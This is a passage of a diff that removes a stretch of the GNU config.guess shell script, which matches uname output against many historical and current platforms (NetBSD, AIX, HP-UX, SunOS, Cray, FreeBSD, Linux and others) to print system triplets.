-	    *) machine="$UNAME_MACHINE_ARCH"-unknown ;;
-	esac
-	# The Operating System including object format, if it has switched
-	# to ELF recently (or will in the future) and ABI.
-	case "$UNAME_MACHINE_ARCH" in
-	    earm*)
-		os=netbsdelf
-		;;
-	    arm*|i386|m68k|ns32k|sh3*|sparc|vax)
-		set_cc_for_build
-		if echo __ELF__ | $CC_FOR_BUILD -E - 2>/dev/null \
-			| grep -q __ELF__
-		then
-		    # Once all utilities can be ECOFF (netbsdecoff) or a.out (netbsdaout).
-		    # Return netbsd for either.  FIX?
-		    os=netbsd
-		else
-		    os=netbsdelf
-		fi
-		;;
-	    *)
-		os=netbsd
-		;;
-	esac
-	# Determine ABI tags.
-	case "$UNAME_MACHINE_ARCH" in
-	    earm*)
-		expr='s/^earmv[0-9]/-eabi/;s/eb$//'
-		abi=$(echo "$UNAME_MACHINE_ARCH" | sed -e "$expr")
-		;;
-	esac
-	# The OS release
-	# Debian GNU/NetBSD machines have a different userland, and
-	# thus, need a distinct triplet. However, they do not need
-	# kernel version information, so it can be replaced with a
-	# suitable tag, in the style of linux-gnu.
-	case "$UNAME_VERSION" in
-	    Debian*)
-		release='-gnu'
-		;;
-	    *)
-		release=$(echo "$UNAME_RELEASE" | sed -e 's/[-_].*//' | cut -d. -f1,2)
-		;;
-	esac
-	# Since CPU_TYPE-MANUFACTURER-KERNEL-OPERATING_SYSTEM:
-	# contains redundant information, the shorter form:
-	# CPU_TYPE-MANUFACTURER-OPERATING_SYSTEM is used.
-	echo "$machine-${os}${release}${abi-}"
-	exit ;;
-    *:Bitrig:*:*)
-	UNAME_MACHINE_ARCH=$(arch | sed 's/Bitrig.//')
-	echo "$UNAME_MACHINE_ARCH"-unknown-bitrig"$UNAME_RELEASE"
-	exit ;;
-    *:OpenBSD:*:*)
-	UNAME_MACHINE_ARCH=$(arch | sed 's/OpenBSD.//')
-	echo "$UNAME_MACHINE_ARCH"-unknown-openbsd"$UNAME_RELEASE"
-	exit ;;
-    *:LibertyBSD:*:*)
-	UNAME_MACHINE_ARCH=$(arch | sed 's/^.*BSD\.//')
-	echo "$UNAME_MACHINE_ARCH"-unknown-libertybsd"$UNAME_RELEASE"
-	exit ;;
-    *:MidnightBSD:*:*)
-	echo "$UNAME_MACHINE"-unknown-midnightbsd"$UNAME_RELEASE"
-	exit ;;
-    *:ekkoBSD:*:*)
-	echo "$UNAME_MACHINE"-unknown-ekkobsd"$UNAME_RELEASE"
-	exit ;;
-    *:SolidBSD:*:*)
-	echo "$UNAME_MACHINE"-unknown-solidbsd"$UNAME_RELEASE"
-	exit ;;
-    *:OS108:*:*)
-	echo "$UNAME_MACHINE"-unknown-os108_"$UNAME_RELEASE"
-	exit ;;
-    macppc:MirBSD:*:*)
-	echo powerpc-unknown-mirbsd"$UNAME_RELEASE"
-	exit ;;
-    *:MirBSD:*:*)
-	echo "$UNAME_MACHINE"-unknown-mirbsd"$UNAME_RELEASE"
-	exit ;;
-    *:Sortix:*:*)
-	echo "$UNAME_MACHINE"-unknown-sortix
-	exit ;;
-    *:Twizzler:*:*)
-	echo "$UNAME_MACHINE"-unknown-twizzler
-	exit ;;
-    *:Redox:*:*)
-	echo "$UNAME_MACHINE"-unknown-redox
-	exit ;;
-    mips:OSF1:*.*)
-	echo mips-dec-osf1
-	exit ;;
-    alpha:OSF1:*:*)
-	case $UNAME_RELEASE in
-	*4.0)
-		UNAME_RELEASE=$(/usr/sbin/sizer -v | awk '{print $3}')
-		;;
-	*5.*)
-		UNAME_RELEASE=$(/usr/sbin/sizer -v | awk '{print $4}')
-		;;
-	esac
-	# According to Compaq, /usr/sbin/psrinfo has been available on
-	# OSF/1 and Tru64 systems produced since 1995.  I hope that
-	# covers most systems running today.  This code pipes the CPU
-	# types through head -n 1, so we only detect the type of CPU 0.
-	ALPHA_CPU_TYPE=$(/usr/sbin/psrinfo -v | sed -n -e 's/^  The alpha \(.*\) processor.*$/\1/p' | head -n 1)
-	case "$ALPHA_CPU_TYPE" in
-	    "EV4 (21064)")
-		UNAME_MACHINE=alpha ;;
-	    "EV4.5 (21064)")
-		UNAME_MACHINE=alpha ;;
-	    "LCA4 (21066/21068)")
-		UNAME_MACHINE=alpha ;;
-	    "EV5 (21164)")
-		UNAME_MACHINE=alphaev5 ;;
-	    "EV5.6 (21164A)")
-		UNAME_MACHINE=alphaev56 ;;
-	    "EV5.6 (21164PC)")
-		UNAME_MACHINE=alphapca56 ;;
-	    "EV5.7 (21164PC)")
-		UNAME_MACHINE=alphapca57 ;;
-	    "EV6 (21264)")
-		UNAME_MACHINE=alphaev6 ;;
-	    "EV6.7 (21264A)")
-		UNAME_MACHINE=alphaev67 ;;
-	    "EV6.8CB (21264C)")
-		UNAME_MACHINE=alphaev68 ;;
-	    "EV6.8AL (21264B)")
-		UNAME_MACHINE=alphaev68 ;;
-	    "EV6.8CX (21264D)")
-		UNAME_MACHINE=alphaev68 ;;
-	    "EV6.9A (21264/EV69A)")
-		UNAME_MACHINE=alphaev69 ;;
-	    "EV7 (21364)")
-		UNAME_MACHINE=alphaev7 ;;
-	    "EV7.9 (21364A)")
-		UNAME_MACHINE=alphaev79 ;;
-	esac
-	# A Pn.n version is a patched version.
-	# A Vn.n version is a released version.
-	# A Tn.n version is a released field test version.
-	# A Xn.n version is an unreleased experimental baselevel.
-	# 1.2 uses "1.2" for uname -r.
-	echo "$UNAME_MACHINE"-dec-osf"$(echo "$UNAME_RELEASE" | sed -e 's/^[PVTX]//' | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz)"
-	# Reset EXIT trap before exiting to avoid spurious non-zero exit code.
-	exitcode=$?
-	trap '' 0
-	exit $exitcode ;;
-    Amiga*:UNIX_System_V:4.0:*)
-	echo m68k-unknown-sysv4
-	exit ;;
-    *:[Aa]miga[Oo][Ss]:*:*)
-	echo "$UNAME_MACHINE"-unknown-amigaos
-	exit ;;
-    *:[Mm]orph[Oo][Ss]:*:*)
-	echo "$UNAME_MACHINE"-unknown-morphos
-	exit ;;
-    *:OS/390:*:*)
-	echo i370-ibm-openedition
-	exit ;;
-    *:z/VM:*:*)
-	echo s390-ibm-zvmoe
-	exit ;;
-    *:OS400:*:*)
-	echo powerpc-ibm-os400
-	exit ;;
-    arm:RISC*:1.[012]*:*|arm:riscix:1.[012]*:*)
-	echo arm-acorn-riscix"$UNAME_RELEASE"
-	exit ;;
-    arm*:riscos:*:*|arm*:RISCOS:*:*)
-	echo arm-unknown-riscos
-	exit ;;
-    SR2?01:HI-UX/MPP:*:* | SR8000:HI-UX/MPP:*:*)
-	echo hppa1.1-hitachi-hiuxmpp
-	exit ;;
-    Pyramid*:OSx*:*:* | MIS*:OSx*:*:* | MIS*:SMP_DC-OSx*:*:*)
-	# akee@wpdis03.wpafb.af.mil (Earle F. Ake) contributed MIS and NILE.
-	if test "$( (/bin/universe) 2>/dev/null)" = att ; then
-		echo pyramid-pyramid-sysv3
-	else
-		echo pyramid-pyramid-bsd
-	fi
-	exit ;;
-    NILE*:*:*:dcosx)
-	echo pyramid-pyramid-svr4
-	exit ;;
-    DRS?6000:unix:4.0:6*)
-	echo sparc-icl-nx6
-	exit ;;
-    DRS?6000:UNIX_SV:4.2*:7* | DRS?6000:isis:4.2*:7*)
-	case $(/usr/bin/uname -p) in
-	    sparc) echo sparc-icl-nx7; exit ;;
-	esac ;;
-    s390x:SunOS:*:*)
-	echo "$UNAME_MACHINE"-ibm-solaris2"$(echo "$UNAME_RELEASE" | sed -e 's/[^.]*//')"
-	exit ;;
-    sun4H:SunOS:5.*:*)
-	echo sparc-hal-solaris2"$(echo "$UNAME_RELEASE"|sed -e 's/[^.]*//')"
-	exit ;;
-    sun4*:SunOS:5.*:* | tadpole*:SunOS:5.*:*)
-	echo sparc-sun-solaris2"$(echo "$UNAME_RELEASE" | sed -e 's/[^.]*//')"
-	exit ;;
-    i86pc:AuroraUX:5.*:* | i86xen:AuroraUX:5.*:*)
-	echo i386-pc-auroraux"$UNAME_RELEASE"
-	exit ;;
-    i86pc:SunOS:5.*:* | i86xen:SunOS:5.*:*)
-	set_cc_for_build
-	SUN_ARCH=i386
-	# If there is a compiler, see if it is configured for 64-bit objects.
-	# Note that the Sun cc does not turn __LP64__ into 1 like gcc does.
-	# This test works for both compilers.
-	if test "$CC_FOR_BUILD" != no_compiler_found; then
-	    if (echo '#ifdef __amd64'; echo IS_64BIT_ARCH; echo '#endif') | \
-		(CCOPTS="" $CC_FOR_BUILD -E - 2>/dev/null) | \
-		grep IS_64BIT_ARCH >/dev/null
-	    then
-		SUN_ARCH=x86_64
-	    fi
-	fi
-	echo "$SUN_ARCH"-pc-solaris2"$(echo "$UNAME_RELEASE"|sed -e 's/[^.]*//')"
-	exit ;;
-    sun4*:SunOS:6*:*)
-	# According to config.sub, this is the proper way to canonicalize
-	# SunOS6.  Hard to guess exactly what SunOS6 will be like, but
-	# it's likely to be more like Solaris than SunOS4.
-	echo sparc-sun-solaris3"$(echo "$UNAME_RELEASE"|sed -e 's/[^.]*//')"
-	exit ;;
-    sun4*:SunOS:*:*)
-	case "$(/usr/bin/arch -k)" in
-	    Series*|S4*)
-		UNAME_RELEASE=$(uname -v)
-		;;
-	esac
-	# Japanese Language versions have a version number like `4.1.3-JL'.
-	echo sparc-sun-sunos"$(echo "$UNAME_RELEASE"|sed -e 's/-/_/')"
-	exit ;;
-    sun3*:SunOS:*:*)
-	echo m68k-sun-sunos"$UNAME_RELEASE"
-	exit ;;
-    sun*:*:4.2BSD:*)
-	UNAME_RELEASE=$( (sed 1q /etc/motd | awk '{print substr($5,1,3)}') 2>/dev/null)
-	test "x$UNAME_RELEASE" = x && UNAME_RELEASE=3
-	case "$(/bin/arch)" in
-	    sun3)
-		echo m68k-sun-sunos"$UNAME_RELEASE"
-		;;
-	    sun4)
-		echo sparc-sun-sunos"$UNAME_RELEASE"
-		;;
-	esac
-	exit ;;
-    aushp:SunOS:*:*)
-	echo sparc-auspex-sunos"$UNAME_RELEASE"
-	exit ;;
-    # The situation for MiNT is a little confusing.  The machine name
-    # can be virtually everything (everything which is not
-    # "atarist" or "atariste" at least should have a processor
-    # > m68000).  The system name ranges from "MiNT" over "FreeMiNT"
-    # to the lowercase version "mint" (or "freemint").  Finally
-    # the system name "TOS" denotes a system which is actually not
-    # MiNT.  But MiNT is downward compatible to TOS, so this should
-    # be no problem.
-    atarist[e]:*MiNT:*:* | atarist[e]:*mint:*:* | atarist[e]:*TOS:*:*)
-	echo m68k-atari-mint"$UNAME_RELEASE"
-	exit ;;
-    atari*:*MiNT:*:* | atari*:*mint:*:* | atarist[e]:*TOS:*:*)
-	echo m68k-atari-mint"$UNAME_RELEASE"
-	exit ;;
-    *falcon*:*MiNT:*:* | *falcon*:*mint:*:* | *falcon*:*TOS:*:*)
-	echo m68k-atari-mint"$UNAME_RELEASE"
-	exit ;;
-    milan*:*MiNT:*:* | milan*:*mint:*:* | *milan*:*TOS:*:*)
-	echo m68k-milan-mint"$UNAME_RELEASE"
-	exit ;;
-    hades*:*MiNT:*:* | hades*:*mint:*:* | *hades*:*TOS:*:*)
-	echo m68k-hades-mint"$UNAME_RELEASE"
-	exit ;;
-    *:*MiNT:*:* | *:*mint:*:* | *:*TOS:*:*)
-	echo m68k-unknown-mint"$UNAME_RELEASE"
-	exit ;;
-    m68k:machten:*:*)
-	echo m68k-apple-machten"$UNAME_RELEASE"
-	exit ;;
-    powerpc:machten:*:*)
-	echo powerpc-apple-machten"$UNAME_RELEASE"
-	exit ;;
-    RISC*:Mach:*:*)
-	echo mips-dec-mach_bsd4.3
-	exit ;;
-    RISC*:ULTRIX:*:*)
-	echo mips-dec-ultrix"$UNAME_RELEASE"
-	exit ;;
-    VAX*:ULTRIX*:*:*)
-	echo vax-dec-ultrix"$UNAME_RELEASE"
-	exit ;;
-    2020:CLIX:*:* | 2430:CLIX:*:*)
-	echo clipper-intergraph-clix"$UNAME_RELEASE"
-	exit ;;
-    mips:*:*:UMIPS | mips:*:*:RISCos)
-	set_cc_for_build
-	sed 's/^	//' << EOF > "$dummy.c"
-#ifdef __cplusplus
-#include   /* for printf() prototype */
-	int main (int argc, char *argv[]) {
-#else
-	int main (argc, argv) int argc; char *argv[]; {
-#endif
-	#if defined (host_mips) && defined (MIPSEB)
-	#if defined (SYSTYPE_SYSV)
-	  printf ("mips-mips-riscos%ssysv\\n", argv[1]); exit (0);
-	#endif
-	#if defined (SYSTYPE_SVR4)
-	  printf ("mips-mips-riscos%ssvr4\\n", argv[1]); exit (0);
-	#endif
-	#if defined (SYSTYPE_BSD43) || defined(SYSTYPE_BSD)
-	  printf ("mips-mips-riscos%sbsd\\n", argv[1]); exit (0);
-	#endif
-	#endif
-	  exit (-1);
-	}
-EOF
-	$CC_FOR_BUILD -o "$dummy" "$dummy.c" &&
-	  dummyarg=$(echo "$UNAME_RELEASE" | sed -n 's/\([0-9]*\).*/\1/p') &&
-	  SYSTEM_NAME=$("$dummy" "$dummyarg") &&
-	    { echo "$SYSTEM_NAME"; exit; }
-	echo mips-mips-riscos"$UNAME_RELEASE"
-	exit ;;
-    Motorola:PowerMAX_OS:*:*)
-	echo powerpc-motorola-powermax
-	exit ;;
-    Motorola:*:4.3:PL8-*)
-	echo powerpc-harris-powermax
-	exit ;;
-    Night_Hawk:*:*:PowerMAX_OS | Synergy:PowerMAX_OS:*:*)
-	echo powerpc-harris-powermax
-	exit ;;
-    Night_Hawk:Power_UNIX:*:*)
-	echo powerpc-harris-powerunix
-	exit ;;
-    m88k:CX/UX:7*:*)
-	echo m88k-harris-cxux7
-	exit ;;
-    m88k:*:4*:R4*)
-	echo m88k-motorola-sysv4
-	exit ;;
-    m88k:*:3*:R3*)
-	echo m88k-motorola-sysv3
-	exit ;;
-    AViiON:dgux:*:*)
-	# DG/UX returns AViiON for all architectures
-	UNAME_PROCESSOR=$(/usr/bin/uname -p)
-	if test "$UNAME_PROCESSOR" = mc88100 || test "$UNAME_PROCESSOR" = mc88110
-	then
-	    if test "$TARGET_BINARY_INTERFACE"x = m88kdguxelfx || \
-	       test "$TARGET_BINARY_INTERFACE"x = x
-	    then
-		echo m88k-dg-dgux"$UNAME_RELEASE"
-	    else
-		echo m88k-dg-dguxbcs"$UNAME_RELEASE"
-	    fi
-	else
-	    echo i586-dg-dgux"$UNAME_RELEASE"
-	fi
-	exit ;;
-    M88*:DolphinOS:*:*)	# DolphinOS (SVR3)
-	echo m88k-dolphin-sysv3
-	exit ;;
-    M88*:*:R3*:*)
-	# Delta 88k system running SVR3
-	echo m88k-motorola-sysv3
-	exit ;;
-    XD88*:*:*:*) # Tektronix XD88 system running UTekV (SVR3)
-	echo m88k-tektronix-sysv3
-	exit ;;
-    Tek43[0-9][0-9]:UTek:*:*) # Tektronix 4300 system running UTek (BSD)
-	echo m68k-tektronix-bsd
-	exit ;;
-    *:IRIX*:*:*)
-	echo mips-sgi-irix"$(echo "$UNAME_RELEASE"|sed -e 's/-/_/g')"
-	exit ;;
-    ????????:AIX?:[12].1:2)   # AIX 2.2.1 or AIX 2.1.1 is RT/PC AIX.
-	echo romp-ibm-aix     # uname -m gives an 8 hex-code CPU id
-	exit ;;               # Note that: echo "'$(uname -s)'" gives 'AIX '
-    i*86:AIX:*:*)
-	echo i386-ibm-aix
-	exit ;;
-    ia64:AIX:*:*)
-	if test -x /usr/bin/oslevel ; then
-		IBM_REV=$(/usr/bin/oslevel)
-	else
-		IBM_REV="$UNAME_VERSION.$UNAME_RELEASE"
-	fi
-	echo "$UNAME_MACHINE"-ibm-aix"$IBM_REV"
-	exit ;;
-    *:AIX:2:3)
-	if grep bos325 /usr/include/stdio.h >/dev/null 2>&1; then
-		set_cc_for_build
-		sed 's/^		//' << EOF > "$dummy.c"
-		#include 
-
-		main()
-			{
-			if (!__power_pc())
-				exit(1);
-			puts("powerpc-ibm-aix3.2.5");
-			exit(0);
-			}
-EOF
-		if $CC_FOR_BUILD -o "$dummy" "$dummy.c" && SYSTEM_NAME=$("$dummy")
-		then
-			echo "$SYSTEM_NAME"
-		else
-			echo rs6000-ibm-aix3.2.5
-		fi
-	elif grep bos324 /usr/include/stdio.h >/dev/null 2>&1; then
-		echo rs6000-ibm-aix3.2.4
-	else
-		echo rs6000-ibm-aix3.2
-	fi
-	exit ;;
-    *:AIX:*:[4567])
-	IBM_CPU_ID=$(/usr/sbin/lsdev -C -c processor -S available | sed 1q | awk '{ print $1 }')
-	if /usr/sbin/lsattr -El "$IBM_CPU_ID" | grep ' POWER' >/dev/null 2>&1; then
-		IBM_ARCH=rs6000
-	else
-		IBM_ARCH=powerpc
-	fi
-	if test -x /usr/bin/lslpp ; then
-		IBM_REV=$(/usr/bin/lslpp -Lqc bos.rte.libc |
-			   awk -F: '{ print $3 }' | sed s/[0-9]*$/0/)
-	else
-		IBM_REV="$UNAME_VERSION.$UNAME_RELEASE"
-	fi
-	echo "$IBM_ARCH"-ibm-aix"$IBM_REV"
-	exit ;;
-    *:AIX:*:*)
-	echo rs6000-ibm-aix
-	exit ;;
-    ibmrt:4.4BSD:*|romp-ibm:4.4BSD:*)
-	echo romp-ibm-bsd4.4
-	exit ;;
-    ibmrt:*BSD:*|romp-ibm:BSD:*)            # covers RT/PC BSD and
-	echo romp-ibm-bsd"$UNAME_RELEASE"   # 4.3 with uname added to
-	exit ;;                             # report: romp-ibm BSD 4.3
-    *:BOSX:*:*)
-	echo rs6000-bull-bosx
-	exit ;;
-    DPX/2?00:B.O.S.:*:*)
-	echo m68k-bull-sysv3
-	exit ;;
-    9000/[34]??:4.3bsd:1.*:*)
-	echo m68k-hp-bsd
-	exit ;;
-    hp300:4.4BSD:*:* | 9000/[34]??:4.3bsd:2.*:*)
-	echo m68k-hp-bsd4.4
-	exit ;;
-    9000/[34678]??:HP-UX:*:*)
-	HPUX_REV=$(echo "$UNAME_RELEASE"|sed -e 's/[^.]*.[0B]*//')
-	case "$UNAME_MACHINE" in
-	    9000/31?)            HP_ARCH=m68000 ;;
-	    9000/[34]??)         HP_ARCH=m68k ;;
-	    9000/[678][0-9][0-9])
-		if test -x /usr/bin/getconf; then
-		    sc_cpu_version=$(/usr/bin/getconf SC_CPU_VERSION 2>/dev/null)
-		    sc_kernel_bits=$(/usr/bin/getconf SC_KERNEL_BITS 2>/dev/null)
-		    case "$sc_cpu_version" in
-		      523) HP_ARCH=hppa1.0 ;; # CPU_PA_RISC1_0
-		      528) HP_ARCH=hppa1.1 ;; # CPU_PA_RISC1_1
-		      532)                      # CPU_PA_RISC2_0
-			case "$sc_kernel_bits" in
-			  32) HP_ARCH=hppa2.0n ;;
-			  64) HP_ARCH=hppa2.0w ;;
-			  '') HP_ARCH=hppa2.0 ;;   # HP-UX 10.20
-			esac ;;
-		    esac
-		fi
-		if test "$HP_ARCH" = ""; then
-		    set_cc_for_build
-		    sed 's/^		//' << EOF > "$dummy.c"
-
-		#define _HPUX_SOURCE
-		#include 
-		#include 
-
-		int main ()
-		{
-		#if defined(_SC_KERNEL_BITS)
-		    long bits = sysconf(_SC_KERNEL_BITS);
-		#endif
-		    long cpu  = sysconf (_SC_CPU_VERSION);
-
-		    switch (cpu)
-			{
-			case CPU_PA_RISC1_0: puts ("hppa1.0"); break;
-			case CPU_PA_RISC1_1: puts ("hppa1.1"); break;
-			case CPU_PA_RISC2_0:
-		#if defined(_SC_KERNEL_BITS)
-			    switch (bits)
-				{
-				case 64: puts ("hppa2.0w"); break;
-				case 32: puts ("hppa2.0n"); break;
-				default: puts ("hppa2.0"); break;
-				} break;
-		#else  /* !defined(_SC_KERNEL_BITS) */
-			    puts ("hppa2.0"); break;
-		#endif
-			default: puts ("hppa1.0"); break;
-			}
-		    exit (0);
-		}
-EOF
-		    (CCOPTS="" $CC_FOR_BUILD -o "$dummy" "$dummy.c" 2>/dev/null) && HP_ARCH=$("$dummy")
-		    test -z "$HP_ARCH" && HP_ARCH=hppa
-		fi ;;
-	esac
-	if test "$HP_ARCH" = hppa2.0w
-	then
-	    set_cc_for_build
-
-	    # hppa2.0w-hp-hpux* has a 64-bit kernel and a compiler generating
-	    # 32-bit code.  hppa64-hp-hpux* has the same kernel and a compiler
-	    # generating 64-bit code.  GNU and HP use different nomenclature:
-	    #
-	    # $ CC_FOR_BUILD=cc ./config.guess
-	    # => hppa2.0w-hp-hpux11.23
-	    # $ CC_FOR_BUILD="cc +DA2.0w" ./config.guess
-	    # => hppa64-hp-hpux11.23
-
-	    if echo __LP64__ | (CCOPTS="" $CC_FOR_BUILD -E - 2>/dev/null) |
-		grep -q __LP64__
-	    then
-		HP_ARCH=hppa2.0w
-	    else
-		HP_ARCH=hppa64
-	    fi
-	fi
-	echo "$HP_ARCH"-hp-hpux"$HPUX_REV"
-	exit ;;
-    ia64:HP-UX:*:*)
-	HPUX_REV=$(echo "$UNAME_RELEASE"|sed -e 's/[^.]*.[0B]*//')
-	echo ia64-hp-hpux"$HPUX_REV"
-	exit ;;
-    3050*:HI-UX:*:*)
-	set_cc_for_build
-	sed 's/^	//' << EOF > "$dummy.c"
-	#include 
-	int
-	main ()
-	{
-	  long cpu = sysconf (_SC_CPU_VERSION);
-	  /* The order matters, because CPU_IS_HP_MC68K erroneously returns
-	     true for CPU_PA_RISC1_0.  CPU_IS_PA_RISC returns correct
-	     results, however.  */
-	  if (CPU_IS_PA_RISC (cpu))
-	    {
-	      switch (cpu)
-		{
-		  case CPU_PA_RISC1_0: puts ("hppa1.0-hitachi-hiuxwe2"); break;
-		  case CPU_PA_RISC1_1: puts ("hppa1.1-hitachi-hiuxwe2"); break;
-		  case CPU_PA_RISC2_0: puts ("hppa2.0-hitachi-hiuxwe2"); break;
-		  default: puts ("hppa-hitachi-hiuxwe2"); break;
-		}
-	    }
-	  else if (CPU_IS_HP_MC68K (cpu))
-	    puts ("m68k-hitachi-hiuxwe2");
-	  else puts ("unknown-hitachi-hiuxwe2");
-	  exit (0);
-	}
-EOF
-	$CC_FOR_BUILD -o "$dummy" "$dummy.c" && SYSTEM_NAME=$("$dummy") &&
-		{ echo "$SYSTEM_NAME"; exit; }
-	echo unknown-hitachi-hiuxwe2
-	exit ;;
-    9000/7??:4.3bsd:*:* | 9000/8?[79]:4.3bsd:*:*)
-	echo hppa1.1-hp-bsd
-	exit ;;
-    9000/8??:4.3bsd:*:*)
-	echo hppa1.0-hp-bsd
-	exit ;;
-    *9??*:MPE/iX:*:* | *3000*:MPE/iX:*:*)
-	echo hppa1.0-hp-mpeix
-	exit ;;
-    hp7??:OSF1:*:* | hp8?[79]:OSF1:*:*)
-	echo hppa1.1-hp-osf
-	exit ;;
-    hp8??:OSF1:*:*)
-	echo hppa1.0-hp-osf
-	exit ;;
-    i*86:OSF1:*:*)
-	if test -x /usr/sbin/sysversion ; then
-	    echo "$UNAME_MACHINE"-unknown-osf1mk
-	else
-	    echo "$UNAME_MACHINE"-unknown-osf1
-	fi
-	exit ;;
-    parisc*:Lites*:*:*)
-	echo hppa1.1-hp-lites
-	exit ;;
-    C1*:ConvexOS:*:* | convex:ConvexOS:C1*:*)
-	echo c1-convex-bsd
-	exit ;;
-    C2*:ConvexOS:*:* | convex:ConvexOS:C2*:*)
-	if getsysinfo -f scalar_acc
-	then echo c32-convex-bsd
-	else echo c2-convex-bsd
-	fi
-	exit ;;
-    C34*:ConvexOS:*:* | convex:ConvexOS:C34*:*)
-	echo c34-convex-bsd
-	exit ;;
-    C38*:ConvexOS:*:* | convex:ConvexOS:C38*:*)
-	echo c38-convex-bsd
-	exit ;;
-    C4*:ConvexOS:*:* | convex:ConvexOS:C4*:*)
-	echo c4-convex-bsd
-	exit ;;
-    CRAY*Y-MP:*:*:*)
-	echo ymp-cray-unicos"$UNAME_RELEASE" | sed -e 's/\.[^.]*$/.X/'
-	exit ;;
-    CRAY*[A-Z]90:*:*:*)
-	echo "$UNAME_MACHINE"-cray-unicos"$UNAME_RELEASE" \
-	| sed -e 's/CRAY.*\([A-Z]90\)/\1/' \
-	      -e y/ABCDEFGHIJKLMNOPQRSTUVWXYZ/abcdefghijklmnopqrstuvwxyz/ \
-	      -e 's/\.[^.]*$/.X/'
-	exit ;;
-    CRAY*TS:*:*:*)
-	echo t90-cray-unicos"$UNAME_RELEASE" | sed -e 's/\.[^.]*$/.X/'
-	exit ;;
-    CRAY*T3E:*:*:*)
-	echo alphaev5-cray-unicosmk"$UNAME_RELEASE" | sed -e 's/\.[^.]*$/.X/'
-	exit ;;
-    CRAY*SV1:*:*:*)
-	echo sv1-cray-unicos"$UNAME_RELEASE" | sed -e 's/\.[^.]*$/.X/'
-	exit ;;
-    *:UNICOS/mp:*:*)
-	echo craynv-cray-unicosmp"$UNAME_RELEASE" | sed -e 's/\.[^.]*$/.X/'
-	exit ;;
-    F30[01]:UNIX_System_V:*:* | F700:UNIX_System_V:*:*)
-	FUJITSU_PROC=$(uname -m | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz)
-	FUJITSU_SYS=$(uname -p | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz | sed -e 's/\///')
-	FUJITSU_REL=$(echo "$UNAME_RELEASE" | sed -e 's/ /_/')
-	echo "${FUJITSU_PROC}-fujitsu-${FUJITSU_SYS}${FUJITSU_REL}"
-	exit ;;
-    5000:UNIX_System_V:4.*:*)
-	FUJITSU_SYS=$(uname -p | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz | sed -e 's/\///')
-	FUJITSU_REL=$(echo "$UNAME_RELEASE" | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz | sed -e 's/ /_/')
-	echo "sparc-fujitsu-${FUJITSU_SYS}${FUJITSU_REL}"
-	exit ;;
-    i*86:BSD/386:*:* | i*86:BSD/OS:*:* | *:Ascend\ Embedded/OS:*:*)
-	echo "$UNAME_MACHINE"-pc-bsdi"$UNAME_RELEASE"
-	exit ;;
-    sparc*:BSD/OS:*:*)
-	echo sparc-unknown-bsdi"$UNAME_RELEASE"
-	exit ;;
-    *:BSD/OS:*:*)
-	echo "$UNAME_MACHINE"-unknown-bsdi"$UNAME_RELEASE"
-	exit ;;
-    arm:FreeBSD:*:*)
-	UNAME_PROCESSOR=$(uname -p)
-	set_cc_for_build
-	if echo __ARM_PCS_VFP | $CC_FOR_BUILD -E - 2>/dev/null \
-	    | grep -q __ARM_PCS_VFP
-	then
-	    echo "${UNAME_PROCESSOR}"-unknown-freebsd"$(echo ${UNAME_RELEASE}|sed -e 's/[-(].*//')"-gnueabi
-	else
-	    echo "${UNAME_PROCESSOR}"-unknown-freebsd"$(echo ${UNAME_RELEASE}|sed -e 's/[-(].*//')"-gnueabihf
-	fi
-	exit ;;
-    *:FreeBSD:*:*)
-	UNAME_PROCESSOR=$(/usr/bin/uname -p)
-	case "$UNAME_PROCESSOR" in
-	    amd64)
-		UNAME_PROCESSOR=x86_64 ;;
-	    i386)
-		UNAME_PROCESSOR=i586 ;;
-	esac
-	echo "$UNAME_PROCESSOR"-unknown-freebsd"$(echo "$UNAME_RELEASE"|sed -e 's/[-(].*//')"
-	exit ;;
-    i*:CYGWIN*:*)
-	echo "$UNAME_MACHINE"-pc-cygwin
-	exit ;;
-    *:MINGW64*:*)
-	echo "$UNAME_MACHINE"-pc-mingw64
-	exit ;;
-    *:MINGW*:*)
-	echo "$UNAME_MACHINE"-pc-mingw32
-	exit ;;
-    *:MSYS*:*)
-	echo "$UNAME_MACHINE"-pc-msys
-	exit ;;
-    i*:PW*:*)
-	echo "$UNAME_MACHINE"-pc-pw32
-	exit ;;
-    *:Interix*:*)
-	case "$UNAME_MACHINE" in
-	    x86)
-		echo i586-pc-interix"$UNAME_RELEASE"
-		exit ;;
-	    authenticamd | genuineintel | EM64T)
-		echo x86_64-unknown-interix"$UNAME_RELEASE"
-		exit ;;
-	    IA64)
-		echo ia64-unknown-interix"$UNAME_RELEASE"
-		exit ;;
-	esac ;;
-    i*:UWIN*:*)
-	echo "$UNAME_MACHINE"-pc-uwin
-	exit ;;
-    amd64:CYGWIN*:*:* | x86_64:CYGWIN*:*:*)
-	echo x86_64-pc-cygwin
-	exit ;;
-    prep*:SunOS:5.*:*)
-	echo powerpcle-unknown-solaris2"$(echo "$UNAME_RELEASE"|sed -e 's/[^.]*//')"
-	exit ;;
-    *:GNU:*:*)
-	# the GNU system
-	echo "$(echo "$UNAME_MACHINE"|sed -e 's,[-/].*$,,')-unknown-$LIBC$(echo "$UNAME_RELEASE"|sed -e 's,/.*$,,')"
-	exit ;;
-    *:GNU/*:*:*)
-	# other systems with GNU libc and userland
-	echo "$UNAME_MACHINE-unknown-$(echo "$UNAME_SYSTEM" | sed 's,^[^/]*/,,' | tr "[:upper:]" "[:lower:]")$(echo "$UNAME_RELEASE"|sed -e 's/[-(].*//')-$LIBC"
-	exit ;;
-    *:Minix:*:*)
-	echo "$UNAME_MACHINE"-unknown-minix
-	exit ;;
-    aarch64:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    aarch64_be:Linux:*:*)
-	UNAME_MACHINE=aarch64_be
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    alpha:Linux:*:*)
-	case $(sed -n '/^cpu model/s/^.*: \(.*\)/\1/p' /proc/cpuinfo 2>/dev/null) in
-	  EV5)   UNAME_MACHINE=alphaev5 ;;
-	  EV56)  UNAME_MACHINE=alphaev56 ;;
-	  PCA56) UNAME_MACHINE=alphapca56 ;;
-	  PCA57) UNAME_MACHINE=alphapca56 ;;
-	  EV6)   UNAME_MACHINE=alphaev6 ;;
